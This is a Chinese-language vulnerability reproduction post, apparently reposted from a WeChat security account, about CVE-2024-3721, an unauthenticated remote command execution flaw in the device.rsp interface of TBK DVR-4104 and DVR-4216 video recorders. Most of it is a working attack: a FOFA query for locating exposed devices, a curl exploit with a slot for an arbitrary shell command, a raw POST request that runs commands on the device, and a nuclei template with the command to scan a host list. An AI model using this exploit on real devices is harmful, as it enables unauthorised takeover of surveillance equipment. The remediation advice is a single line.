01 漏洞
02 漏洞影响
- TBK DVR-4104
- TBK DVR-4216
03 漏洞描述
TBK DVR硬盘录像机是一套进行图像计算存储处理的计算机系统,具有对图像语音邓进行长时间录像、录音、远程监控和控制功能。该系统device.rsp接口处存在RCE漏洞,会导致系统被未授权的攻击者远控。
04 FOFA搜索语句
"Location: /login.rsp"
05 漏洞复现
POC
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"
漏洞复现成功
POC数据包如下
POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0(Macintosh;T2lkQm95X0c= Intel Mac OS X10_14_3) AppleWebKit/605.1.15(KHTML, like Gecko) Version/12.0.3Safari/605.1.15Connection:closeContent-Length:0Cookie: uid=1Accept-Encoding: gzip
06 nuclei poc
poc文件内容如下
id: CVE-2024-3721info:name: TBK DVR硬盘录像机 device.rsp 命令执行漏洞author: fgzseverity: criticaldescription:'TBK DVR硬盘录像机是一套进行图像计算存储处理的计算机系统,具有对图像语音邓进行长时间录像、录音、远程监控和控制功能。该系统device.rsp接口处存在RCE漏洞,会导致系统被未授权的攻击者远控。'tags:2024,rce,TBK DVRmetadata:max-request:1fofa-query:"Location: /login.rsp"verified: truehttp:- raw:- |POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0(Macintosh;T2lkQm95X0c= Intel Mac OS X10_14_3) AppleWebKit/605.1.15(KHTML, like Gecko) Version/12.0.3Safari/605.1.15Cookie: uid=1matchers:- type: dsldsl:-"status_code == 200 && contains(body, 'asrgkjh0')"
运行POC
nuclei.exe -t mypoc/cve/CVE-2024-3721.yaml -l data2.txt
07 修复建议
升级到最新版本。
原文始发于微信公众号(AI与网安):CVE-2024-3721漏洞复现
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论